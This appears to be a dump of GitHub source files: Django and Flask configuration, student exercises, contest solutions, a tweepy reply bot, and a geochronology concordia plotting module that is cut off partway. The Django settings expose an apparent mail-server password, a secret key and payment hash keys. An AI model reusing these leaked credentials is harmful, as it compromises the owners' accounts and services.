+{"seq_id":"29240799243","text":"\"\"\"\nDjango settings for asa18 project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'llk5rhxp6^*j^0^!c84u(utby+6^2$-8*+pm6i36fn(n#^5d$*'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['127.0.0.1', '0.0.0.0']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'captcha',\n 'tinymce',\n 'sorl.thumbnail',\n 'mce_filebrowser',\n 'colorfield',\n 'asa18',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'OPTIONS' : {\n 'context_processors': [\n \"django.contrib.auth.context_processors.auth\",\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.i18n\",\n \"django.template.context_processors.media\",\n \"django.template.context_processors.static\",\n \"django.template.context_processors.request\",\n \"django.template.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n ]\n }\n },\n]\n# TEMPLATE_CONTEXT_PROCESSORS = (\n# \"django.contrib.auth.context_processors.auth\",\n# \"django.template.context_processors.debug\",\n# \"django.template.context_processors.i18n\",\n# \"django.template.context_processors.media\",\n# \"django.template.context_processors.static\",\n# \"django.template.context_processors.request\",\n# \"django.template.context_processors.tz\",\n# \"django.contrib.messages.context_processors.messages\",\n# )\n\nROOT_URLCONF = 'asa18.urls_dev'\n\nWSGI_APPLICATION = 'asa18.wsgi.application'\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Australia/Sydney'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nAPPEND_SLASH = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n# TinyMCE setup\nTINYMCE_DEFAULT_CONFIG = {\n 'theme' : 'advanced',\n 'relative_urls': False,\n 'file_browser_callback': 'mce_filebrowser',\n 'resize': True,\n 'theme_advanced_resizing': True,\n 'width': 600,\n 'height': 600,\n}\n\n# DJANGO_COUNTRIES SETUP\nCOUNTRIES_FIRST = [\"AUS\", \"NZ\", ]\n\n# OneStop config\nONESTOP_TRAN_TYPE = '483'\nONESTOP_GLCODE = 'R.35250.ASA.9280'\nONESTOP_STOREID = 'ASA2017'\nONESTOP_PAYMENT_URL = 'fake.test.payment/'\nONESTOP_SECRET_HASH = 'rwar'\nONESTOP_SECRET_HASH_KEY = 'rxCgXTtcHG5uy34r'\n\n# Mail settings\nEMAIL_HOST = 'mso.anu.edu.au'\nEMAIL_PORT = 465\nEMAIL_HOST_USER = 'skymap'\nEMAIL_HOST_PASSWORD = 'Blu8*1=1'\n# EMAIL_USE_SSL = True\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = True\nREGISTRATION_EMAIL = 'ASA2018@astro.swin.edu.au'\n\n# Page display parameters\nGLOBAL_PAGE_TITLE = \"ASA 2018\"\n","repo_name":"Samreay/ASA2018_django","sub_path":"asa18/settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70679380034","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request, render_template\n\nfrom trifle.server.views import *\n\n__all__ = ['create_app']\n\nDEFAULT_BLUEPRINTS = [\n api,\n frontend,\n monitor,\n configure\n]\n\ndef create_app(config=None, app_name=None, blueprints=None):\n \"\"\"Create a Flask app.\"\"\"\n\n if app_name is None:\n app_name = \"Trifle\"\n if blueprints is None:\n blueprints = DEFAULT_BLUEPRINTS\n\n app = Flask(app_name,\n #instance_path=INSTANCE_FOLDER_PATH, \n\t instance_relative_config=True)\n\n configure_app(app, config)\n configure_hook(app)\n configure_blueprints(app, blueprints)\n return app\n\n\ndef configure_app(app, config=None):\n \"\"\"Different ways of configurations.\"\"\"\n\n # http://flask.pocoo.org/docs/api/#configuration\n #app.config.from_object(DefaultConfig)\n\n # http://flask.pocoo.org/docs/config/#instance-folders\n #app.config.from_pyfile('production.cfg', silent=True)\n\n if config:\n app.config.from_object(config)\n\n app.root_path = os.path.abspath(os.path.dirname(__file__))\n app.static_folder = 'static'\n app.templates_folder = 'templates'\n app.secret_key = 'A0Zr98j/3&oaKoaygXfAZsdER~?aijmN]LWX/,?RT'\n\n # Use instance folder instead of env variables to make deployment easier.\n #app.config.from_envvar('%s_APP_CONFIG' % DefaultConfig.PROJECT.upper(), silent=True)\n\n\ndef configure_hook(app):\n \"\"\" Configure the application hooks \"\"\"\n @app.before_request\n def before_request():\n pass\n\n\ndef configure_blueprints(app, blueprints):\n \"\"\"Configure blueprints in views.\"\"\"\n\n for blueprint in blueprints:\n app.register_blueprint(blueprint)\n\n","repo_name":"gloaec/trifle","sub_path":"src/trifle/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39542442073","text":"# 8. Write a Python program to append a list to the second list.\n# consider l1 is [1, 2, 3, 4, 5] and l2 is []\n# using loop add items of l1 in l2\n\nl1 = [1, 2, 3, 4, 5]\nl2 = []\n\nfor i in l1:\n l2.append(i)\n\nprint(l2)","repo_name":"muhammadhuzaifakhan1133/python-backend-assignments","sub_path":"assignment3/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40862363135","text":"#! python3\r\n\r\n#This will be a twitter bot trial and error - may evolve into something more useful.\r\n\r\nimport tweepy, time, os\r\nfrom random import randint\r\n\r\nauth = tweepy.OAuthHandler(os.environ[\"CONSUMER_KEY\"], os.environ[\"CONSUMER_SECRET\"])\r\nauth.set_access_token(os.environ[\"ACCESS_KEY\"], os.environ[\"ACCESS_SECRET\"])\r\n\r\napi = tweepy.API(auth)\r\n\r\nuser_id = \"Chris Kansas\"\r\n\r\nresponses = [\"Spiderman?! What has that creep been up to?\",\r\n\"Spiderman?!?!? Get me some pictures now!\",\r\n\"What a menace to society!\",\r\n\"Why wear a mask? Why doesn't he show his face?\",\r\n\"Spider-Man, Hero or Menace? Exclusive Daily Bugle Photos.\"]\r\n\r\n#api.update_status(\"#HelloWorld - This is JonahBot's first tweet!\")\r\nclass MyStreamListener(tweepy.StreamListener):\r\n\r\n def on_status(self, status):\r\n #print(status.text)\r\n print(status.user.screen_name)\r\n api.update_status(\"@\" + status.user.screen_name + \" \" + responses[randint(0, 4)])\r\n\r\nmyStreamListener = MyStreamListener()\r\nmyStream = tweepy.Stream(auth = api.auth, listener=myStreamListener)\r\n\r\nmyStream.filter(follow=[\"348260063\"], track = [\"#spiderman\"]) #This will track a specific user by user_id and it will track anytime someone tweets \"spiderman\"\r\n\r\n#for follower in tweepy.Cursor(api.followers).items():\r\n #follower.follow()\r\n #print(follower.screen_name)\r\n\r\n#for i in range(5):\r\n #random_number = randint(0, 100)\r\n #api.update_status(\"%s is my favorite number right now.\" % (random_number))\r\n #time.sleep(20)\r\n","repo_name":"ColoradoChris/TwitterBot","sub_path":"bot1.py","file_name":"bot1.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36432062319","text":"#!/usr/bin/python3\n\"\"\"module 12-pascal_triangle\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"returns a pascal's triangle\"\"\"\n if n <= 0:\n return []\n else:\n triangle = []\n for row in range(n):\n current_row = []\n for col in range(row + 1):\n if col == 0 or col == row:\n current_row.append(1)\n else:\n value = triangle[row - 1][col - 1] + triangle[row - 1][col]\n current_row.append(value)\n triangle.append(current_row)\n return triangle\n","repo_name":"Mitchkal/alx-higher_level_programming","sub_path":"0x0B-python-input_output/12-pascal_triangle.py","file_name":"12-pascal_triangle.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43941587305","text":"#ques1\r\nr=[]\r\nfor i in range(2000,3201):\r\n if (i%7==0 and i%5!=0):\r\n r.append(i)\r\nprint(r)\r\n\r\n#ques2\r\nresult=dict()\r\nn=int(input(\"Enter number\"))\r\nfor i in range(1,n+1):\r\n result.update({i:i*i})\r\nprint(result)\r\n\r\n#ques3\r\nnum=int(input(\"enter number\"))\r\nfact=1\r\nfor i in range(n):\r\n fact=fact*(i+1)\r\nprint(\"factorial of number is\",fact)\r\n\r\n#ques4\r\n#(i)\r\na=[5,7,9,3,2,1,4,2,6,3,0,9,8]\r\nfor i in a:\r\n if(a[i]<5):\r\n print(a[i])\r\n\r\n#(ii)\r\nb=[] \r\nfor j in a:\r\n if(a[j]<5):\r\n b.append(a[j])\r\nprint(b)\r\n#(iv)\r\nno=input(\"enter number\")\r\nif no in a:\r\n print(\"element is present in list\")\r\nelse:\r\n print(\"element not in list\")\r\n\r\n#ques 5\r\nline=input(\"enter line\")\r\nprint(line.upper())\r\n\r\n#ques7\r\nstring=input(\"enter string\")\r\nstring=string.split(\" \")\r\nrevstring=string[: :-1]\r\nprint(revstring)\r\n\r\n#ques8\r\nfor i in range(1,5):\r\n print(end=\"\\n\")\r\n for k in range(1,2*i):\r\n if(k>=i):\r\n print(k,end=' ')\r\n#ques9\r\nclass Circle:\r\n def __init__(self,radius):\r\n self.radius=radius\r\n def area(self):\r\n self.area=(3.14*(self.radius)**2)\r\n print(self.area)\r\ny=int(input(\"enter radius\"))\r\nob=Circle(y)\r\nob.area()\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n \r\n \r\n","repo_name":"showYourMeYourCodeDSC/TEST","sub_path":"divya_assisn1.py","file_name":"divya_assisn1.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27211441660","text":"N = int(input())\ndigit = [(i, 0) for i in range(36)]\n\nfor i in range(N):\n number = input()\n for n in range(len(number)-1, -1, -1):\n tmp = number[n]\n if ord(tmp) >= ord('0') and ord(tmp) <= ord('9'):\n tmp = int(tmp)\n else:\n tmp = ord(tmp) - ord('A') + 10\n \n digit[tmp] = (tmp, digit[tmp][1] + pow(36, len(number)-1-n))\n\nK = int(input())\n\ncheck = []\nfor i in range(36):\n check.append((digit[i][1]*(35-i), i))\n\ncheck.sort(reverse=True)\n\nfor i in range(K):\n digit[check[i][1]] = (35, digit[check[i][1]][1])\n\nsum35 = 0\nfor i in range(36):\n sum35 += digit[i][0] * digit[i][1]\n\ndef to36(n):\n if n < 36:\n if n >= 0 and n <= 9:\n print(n, end='')\n else:\n print(chr(ord('A')+n-10), end='')\n return\n\n to36(n//36)\n if n%36 >= 0 and n%36 <= 9:\n print(n%36, end='')\n else:\n print(chr(ord('A')+n%36-10), end='')\n\nto36(sum35)","repo_name":"b-chae/AlgorithmStudy","sub_path":"baekjoon/그리디/1036.py","file_name":"1036.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11637070710","text":"import re\nnum = int(input())\n\nfor _ in range(num):\n message = input()\n pattern = r\"(\\|[A-Z]{4,}\\|):(#[A-Za-z]+\\s[A-Za-z]+#)\"\n result = re.findall(pattern, message)\n if result:\n name = result[0][0][1:-1]\n title = result[0][1][1:-1]\n\n print(f\"{name}, The {title}\")\n print(f\">> Strength: {len(name)}\")\n print(f\">> Armor: {len(title)}\")\n\n else:\n print(\"Access denied!\")\n","repo_name":"ahmedbuchev/SoftUni-Python","sub_path":"01.Fundamentals/12.final_exam/boss_rush.py","file_name":"boss_rush.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23548336971","text":"T = int(input())\r\ncombos = {}\r\nimport sys\r\nsys.setrecursionlimit(5000)\r\ndef flipping(origFaces, s):\r\n minFlips = 0\r\n faces = list(origFaces)\r\n #print(faces)\r\n if tuple([tuple(origFaces),s]) in combos:\r\n minFlips = combos[tuple([tuple(origFaces),s])]\r\n elif faces == list(\"+\"*s):\r\n minFlips = 0\r\n elif faces == list(\"-\"*s):\r\n minFlips = 1\r\n else:\r\n if len(faces) >= s:\r\n if faces[0] == \"+\":\r\n curFlips = flipping(faces[1:], s)\r\n if curFlips != -1:\r\n minFlips = curFlips\r\n else:\r\n minFlips = -1\r\n else:\r\n for y in range(s):\r\n if faces[y] == \"+\":\r\n faces[y] = \"-\"\r\n else:\r\n faces[y] = \"+\"\r\n curFlips = flipping(faces[1:], s)\r\n if curFlips != -1:\r\n minFlips = curFlips + 1\r\n else:\r\n minFlips = -1\r\n else:\r\n minFlips = -1\r\n combos[tuple([tuple(origFaces),s])] = minFlips\r\n return minFlips\r\nfor x in range(T):\r\n pancakes, s = list(raw_input().split(\" \"))\r\n pancakes = list(pancakes)\r\n s = int(s)\r\n theFlips = str(flipping(pancakes, s))\r\n if theFlips != \"-1\":\r\n print(\"Case #\"+str(x+1)+\": \"+theFlips)\r\n else:\r\n print(\"Case #\"+str(x+1)+\": IMPOSSIBLE\")\r\n#print(combos)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/478.py","file_name":"478.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30266313388","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport FFT.FFT as myfft\nimport Devices.Devices as dev\n\n\ndef simulate_sine(freq, amp):\n N = 10000\n T = 1.0 / 800\n\n omega = freq * 2.0 * np.pi\n x = np.linspace(0.0, N * T, N)\n y = amp * np.sin(omega * x)\n return y\n\n\noscilloscope = dev.Oscilloscope('123')\ngenerator = dev.Generator('321')\nfreq, amp = myfft.get_spectrum(simulate_sine(2000, 3))\nplt.plot(freq, amp)\nplt.show()\n","repo_name":"Mr-DarkTesla/FourieAutomation","sub_path":"Process/Process_test_fft.py","file_name":"Process_test_fft.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36483384829","text":"\"\"\"\nConcordia plotting routines for (dis)equilibrium U-Pb datasets.\n\n\"\"\"\n\nimport warnings\nimport numpy as np\n\nfrom scipy import integrate\nfrom scipy import optimize\n\nfrom . import plotting, ludwig\nfrom . import cfg\nfrom . import misc\nfrom . import useries\nfrom . import stats\nfrom .exceptions import ConvergenceError\n\n\nexp = np.exp\n\n\n#=================================\n# Concordia plotting routines\n#=================================\n\ndef plot_concordia(ax, diagram='tw', point_markers=True, age_ellipses=False,\n env=False, marker_max=None, marker_ages=(), auto_markers=True,\n remove_overlaps=True, age_prefix='Ma'):\n \"\"\"\n Plot disequilibrium U-Pb concordia curve on concordia diagram.\n\n Parameters\n ----------\n ax : matplotlib.pyplot.Axes\n Axes object to plot concordia curve in.\n diagram : {'tw', 'wc'}\n Concordia diagram type.\n point_markers : bool, optional\n If True, plot concordia regular single point age markers.\n age_ellipses : bool, optional\n If True plot concordia age ellipse markers that represent effects\n of decay constant uncertainties.\n env : bool, optional\n If True, plot concordia uncertainty envelope showing effects of\n decay constant uncertainties on trajectory of concordia curve.\n marker_max : float, optional\n User specified age marker max (Ma).\n marker_ages : array-like, optional\n List of user defined age marker locations (in same units as age_prefix).\n auto_markers : bool, optional\n If True, this function will attempt to find the most suitable\n concordia age marker locations.\n remove_overlaps : bool, optional\n If True, this function will remove first overlapping concordia age\n marker and all older labels.\n\n Raises\n -------\n UserWarning: if concordia lies entirely outside the axis limits.\n\n \"\"\"\n assert diagram in ('tw', 'wc'), \"diagram must be 'wc' (Wetheril) or 'tw' (Tera-Wasserburg)\"\n assert ax.get_xlim()[1] > ax.get_xlim()[0], 'x-axis limits must be in ascending order'\n assert ax.get_ylim()[1] > ax.get_ylim()[0], 'y-axis limits must be in ascending order'\n\n ax.autoscale(enable=False, axis='both') # freeze axis limits\n\n # ...\n tbounds = cfg.conc_age_bounds\n if auto_markers and (marker_max is not None):\n if not marker_max > tbounds[0]:\n raise ValueError('marker_max value must be greater than the lower '\n 'conc_age_bound value')\n\n code, tlim = eq_age_limits(ax, diagram=diagram, tlim=(0.001, 4600.))\n if code == 1:\n warnings.warn('concordia appears to lie entirely outside axis limits')\n return\n\n # get equally spaced points\n ct, cx, cy = eq_equi_points(*tlim, ax.get_xlim(), ax.get_ylim(),\n diagram, ngp=500_000, n=100)\n # plot line\n ax.plot(cx, cy, **cfg.conc_line_kw, label='concordia line')\n # plot envelope\n if env:\n plot_envelope(ax, diagram, xc=cx)\n if point_markers or age_ellipses:\n if auto_markers and (marker_max is not None) and (marker_max < tlim[1]):\n tlim[1] = marker_max\n if marker_max < tlim[0]:\n warnings.warn('marker_max age is less than auto lower limit '\n '- no markers to plot')\n return\n markers_dict = generate_age_markers(ax, *tlim, tbounds, diagram,\n auto=auto_markers, marker_ages=marker_ages,\n ell=age_ellipses, age_prefix=age_prefix,\n point_markers=point_markers)\n markers_dict = plot_age_markers(ax, markers_dict)\n\n # label markers\n if cfg.individualised_labels:\n individualised_labels(ax, markers_dict, diagram,\n remove_overlaps=remove_overlaps)\n else:\n labels(ax, markers_dict)\n\n\ndef plot_diseq_concordia(ax, A, meas, sA=None, diagram='tw', env=False,\n point_markers=True, age_ellipses=False, marker_max=None,\n marker_ages=(), auto_markers=True, remove_overlaps=True,\n age_prefix='Ma', spaghetti=False):\n \"\"\"\n Plot disequilibrium U-Pb concordia curve on concordia diagram.\n\n Parameters\n ----------\n ax : matplotlib.pyplot.Axes\n Axes object to plot concordia curve in.\n A : array-like\n one-dimensional array of activity ratio values arranged as follows\n - [234U/238U], [230Th/238U], [226Ra/238U], [231Pa/235U]\n meas : array-like\n two-element list of boolean values, the first is True if [234U/238U]\n is a present-day value and False if an initial value, the second is True\n if [230Th/238U] is an present-day value and False if an initial value\n sA : array-like, optional\n one-dimensional array of activity ratio value uncertainties given\n as 1 sigma absolute and arranged in the same order as A\n diagram : {'tw', 'wc'}\n Concordia diagram type.\n point_markers : bool, optional\n If True, plot concordia regular single point age markers.\n age_ellipses : bool, optional\n If True plot concordia age ellipse markers that represent effects\n of decay constant uncertainties.\n env : bool, optional\n If True, plot concordia uncertainty envelope showing effects of\n decay constant uncertainties on trajectory of concordia curve.\n marker_max : float, optional\n User specified age marker max (Ma).\n marker_ages : array-like, optional\n List of user defined age marker locations (in same units as age_prefix).\n auto_markers : bool, optional\n If True, this function will attempt to find the most suitable\n concordia age marker locations.\n remove_overlaps : bool, optional\n If True, this function will remove first overlapping concordia age\n marker and all older labels.\n spaghetti : bool\n Plot each simulated line using arbitrary colours (no longer used).\n\n Raises\n -------\n UserWarning: if concordia lies entirely outside the axis limits.\n\n \"\"\"\n assert diagram == 'tw', 'Wetheril concordia not yet implemented'\n assert ax.get_xlim()[1] > ax.get_xlim()[0], 'x-axis limits must be in ascending order'\n assert ax.get_ylim()[1] > ax.get_ylim()[0], 'y-axis limits must be in ascending order'\n if env or age_ellipses:\n assert sA is not None, 'sA must be given to plot concordia envelope or age ellipses'\n\n ax.autoscale(enable=False, axis='both') # freeze axis limits\n\n # Get hard age limits.\n if meas[1]:\n tbounds = cfg.diseq_conc_age_bounds[2]\n elif meas[0]:\n tbounds = cfg.diseq_conc_age_bounds[1]\n else:\n tbounds = cfg.diseq_conc_age_bounds[0]\n\n if auto_markers and (marker_max is not None):\n if not marker_max > tbounds[0]:\n raise ValueError('marker_max value must be greater than the lower '\n 'conc_age_bound value')\n\n code, tlim, tbounds = diseq_age_limits(ax, A, meas, diagram='tw', tbounds=tbounds,\n max_age=marker_max)\n if code == 1:\n warnings.warn('concordia appears to lie entirely outside axis limits')\n return\n\n # get equally spaced points\n ct, cx, cy = diseq_equi_points(*tlim, ax.get_xlim(), ax.get_ylim(), A, meas,\n diagram, ngp=500_000, n=100)\n # plot line\n ax.plot(cx, cy, **cfg.conc_line_kw, label='concordia line')\n\n # Check if activity ratios are resolvable from equilibrium. Do not plot\n # envelope or ellipses if not.\n # Check measured activity ratios.\n if env or age_ellipses:\n if meas[0]:\n p = stats.two_sample_p(A[0], sA[0], cfg.a234_238_eq, cfg.a234_238_eq_1s)\n if p > 0.05:\n warnings.warn(f'cannot plot concordia envelope or age ellipses if '\n f'[234U/238U] is not sufficiently resolved from equilibrium')\n env, age_ellipses = False, False\n if meas[1]:\n p = stats.two_sample_p(A[0], sA[0], cfg.a234_238_eq, cfg.a234_238_eq_1s)\n if p > 0.05:\n warnings.warn(f'cannot plot concordia envelope or age ellipses if '\n f'[230Th/238U] is not sufficiently resolved from equilibrium')\n env, age_ellipses = False, False\n\n # plot envelope\n pA = None\n if env:\n pA = plot_diseq_envelope(ax, ct, cx, cy, *tlim, tbounds, A, sA, meas,\n diagram='tw', trials=10_000, spaghetti=False)\n if point_markers or age_ellipses:\n if auto_markers and (marker_max is not None) and (marker_max < tlim[1]):\n tlim[1] = marker_max\n if marker_max < tlim[0]:\n warnings.warn('marker_max age is less than auto lower limit '\n '- no markers to plot')\n return\n if age_ellipses and (sA is None or all([x == 0 for x in sA])):\n warnings.warn('cannot plot disequilibrium concordia age ellipses if no '\n 'uncertainity assigned to activity ratios')\n if not point_markers:\n return\n age_ellipses = False\n markers_dict = generate_age_markers(ax, *tlim, tbounds, diagram,\n A=A, sA=sA, meas=meas, auto=auto_markers,\n marker_ages=marker_ages, eq=False,\n ell=age_ellipses, age_prefix=age_prefix,\n point_markers=point_markers)\n markers_dict = plot_age_markers(ax, markers_dict, pA=pA)\n\n # label markers\n if cfg.individualised_labels:\n individualised_labels(ax, markers_dict, diagram,\n remove_overlaps=remove_overlaps)\n else:\n labels(ax, markers_dict)\n\n\n#==============================================================================\n# Eq concordia functions\n#==============================================================================\n\ndef eq_xy(t, diagram):\n \"\"\"\n Return x, y for given t along (equilibrium) concordia curve.\n \"\"\"\n assert diagram in ('tw', 'wc')\n if diagram == 'tw':\n x = 1. / (exp(cfg.lam238 * t) - 1.)\n y = (1. / cfg.U) * (exp(cfg.lam235 * t) - 1.) / (exp(cfg.lam238 * t) - 1.)\n elif diagram == 'wc':\n y = exp(cfg.lam238 * t) - 1.\n x = exp(cfg.lam235 * t) - 1.\n return x, y\n\n\ndef eq_age_x(x, diagram):\n \"\"\"\n Age of point on concordia at given x value.\n \"\"\"\n assert diagram in ('tw', 'wc')\n if diagram == 'wc':\n t = 1. / cfg.lam235 * np.log(1. + x)\n else:\n t = 1. / cfg.lam238 * np.log(1. + 1. / x)\n return t\n\n\ndef eq_slope(t, diagram):\n \"\"\"\n Compute tangent to concordia at given t. I.e. dy/dx for given t.\n \"\"\"\n assert diagram in ('tw', 'wc')\n lam238, lam235, U = cfg.lam238, cfg.lam235, cfg.U\n if diagram == 'wc':\n return lam238 / lam235 * exp((lam238 - lam235) * t)\n elif diagram == 'tw':\n den = (exp(lam238 * t) - 1.)\n dx = -lam238 * exp(lam238 * t) / den ** 2\n dy = lam235 * exp(lam235 * t) / (U * den) - (lam238 *\n exp(lam238 * t) * (exp(lam235 * t) - 1.)) / (U * den ** 2)\n return dy / dx\n\n\ndef eq_age_ellipse(t, diagram):\n \"\"\"\n Age ellipse params for displaying effects of decay constant\n errors on equilibrium concordia age markers. Requires computing uncertainty\n in x and y for a given t value using first-order error propagation.\n \"\"\"\n assert diagram in ('tw', 'wc')\n lam238, lam235, s238, s235 = cfg.lam238, cfg.lam235, cfg.s238, cfg.s235\n if diagram == 'wc':\n sx = t * exp(lam235 * t) * s235\n sy = t * exp(lam238 * t) * s238\n cov_xy = 0. * t # float or array of zeros\n else:\n x, y = eq_xy(t, diagram)\n sx = - x ** 2 * t * exp(lam238 * t) * s238\n sy = x * t * np.sqrt((exp(lam235 * t) * s235 / cfg.U) ** 2 + (\n (y * exp(lam238 * t) * s238) ** 2))\n cov_xy = x ** 3 * y * (t * exp(lam238 * t) * s238) ** 2\n r_xy = cov_xy / (sx * sy)\n return sx, sy, r_xy\n\n\ndef eq_envelope(x, diagram):\n \"\"\"\n Uncertainty in y for a given x value along the concordia to\n display the effects of decay constant errors on trajectory of the concordia\n curve. Requires computing uncertainty in y for a given x value using\n first-order error propagation.\n \"\"\"\n assert diagram in ('tw', 'wc')\n lam238, lam235, s238, s235 = cfg.lam238, cfg.lam235, cfg.s238, cfg.s235\n t = eq_age_x(x, diagram)\n if diagram == 'wc':\n sy = t * exp(lam238 * t) * np.sqrt(s238 ** 2\n + (lam238 / lam235 * s235) ** 2)\n else:\n sy = x * t * exp(lam235 * t) / cfg.U * np.sqrt(s235 ** 2\n + (lam235 / lam238 * s238) ** 2)\n return sy\n\n\ndef eq_velocity(t, xlim, ylim, diagram):\n \"\"\"\n Estimate dr/dt, which is \"eq_velocity\" along an equilibrium concordia curve in\n x-y space. Uses axis coordinates to circumvent scaling issues.\n \"\"\"\n # TODO: this could be calculated analytically for eq case ??\n h = 1e-08 * t\n xspan = xlim[1] - xlim[0]\n yspan = ylim[1] - ylim[0]\n x2, y2 = eq_xy(t + h, diagram)\n x1, y1 = eq_xy(t - h, diagram)\n v = np.sqrt(((x2 - x1) / xspan) ** 2 + ((y2 - y1) / yspan) ** 2) / (2. * h)\n return v\n\n\ndef eq_equi_points(t1, t2, xlim, ylim, diagram, ngp=500_000, n=500):\n \"\"\"\n Uses numerical method to obtain age points that are approximately evenly\n spaced in x, y along equilibrium U-Pb concordia between age limits t1 and t2.\n \"\"\"\n # TODO: could this be done analytically too?\n assert t2 > t1\n t = np.linspace(t1, t2, ngp)\n # suppress numpy warnings\n with np.errstate(all='ignore'):\n dr = eq_velocity(t, xlim, ylim, diagram)\n # Cumulative integrated area under eq_velocity curve (aka cumulative\n # \"distance\") at each t_j from t1 to t2:\n cum_r = integrate.cumtrapz(dr, t, initial=0)\n # Divide cumulative area under eq_velocity curve into equal portions.\n rj = np.arange(n + 1) * cum_r[-1] / n\n # Find t_j value at each r_j:\n idx = np.searchsorted(cum_r, rj, side=\"left\")\n idx[-1] = ngp - 1 if idx[-1] >= ngp else idx[-1]\n t = t[idx]\n x, y = eq_xy(t, diagram)\n return t, x, y\n\n\ndef eq_age_limits(ax, diagram='tw', tlim=(0.001, 4600.)):\n \"\"\"\n\n \"\"\"\n assert diagram in ('tw', 'wc'), \"diagram must be 'wc' (Wetheril) or 'tw' (Tera-Wasserburg)\"\n\n ax_xmin, ax_xmax = ax.get_xlim()\n ax_ymin, ax_ymax = ax.get_ylim()\n\n # --- testing ----\n # tt = np.linspace(1e-03, 4.6e3, 100_000)\n # xx, yy = eq_xy(tt, diagram)\n # ax.plot(xx, yy, 'ro')\n # ax.get_figure().show()\n # -----------\n\n # cx_min, cy_max = eq_xy(tlim[1], diagram)\n # cx_max, cy_min = eq_xy(tlim[0], diagram)\n cx_min, cy_min = eq_xy(tlim[0], diagram)\n cx_max, cy_max = eq_xy(tlim[1], diagram)\n if diagram == 'tw':\n cx_min, cx_max = cx_max, cx_min\n\n # rest ax limits if they extend past hard concordia limits:\n if ax_xmin < cx_min:\n ax_xmin = cx_min\n if ax_xmax > cx_max:\n ax_xmax = cx_max\n if ax_ymin < cy_min:\n ax_ymin = cy_min\n if ax_ymax > cy_max:\n ax_ymax = cy_max\n\n t_min, t_max = None, None\n\n if diagram == 'tw':\n\n t_xmax = 1. / cfg.lam238 * np.log(1. / ax_xmax + 1.)\n t_xmin = 1. / cfg.lam238 * np.log(1. / ax_xmin + 1.)\n\n # check bottom left corner of ax is not above / right of concordia curve\n if eq_xy(t_xmin, diagram)[1] < ax_ymin:\n return 1, [t_min, t_max]\n # check top right corner of ax is not below / left of concordia curve\n if eq_xy(t_xmax, diagram)[1] > ax_ymax:\n return 1, [t_min, t_max]\n\n # check curve goes through ax_xmax b/w ylim\n if ax_ymin < 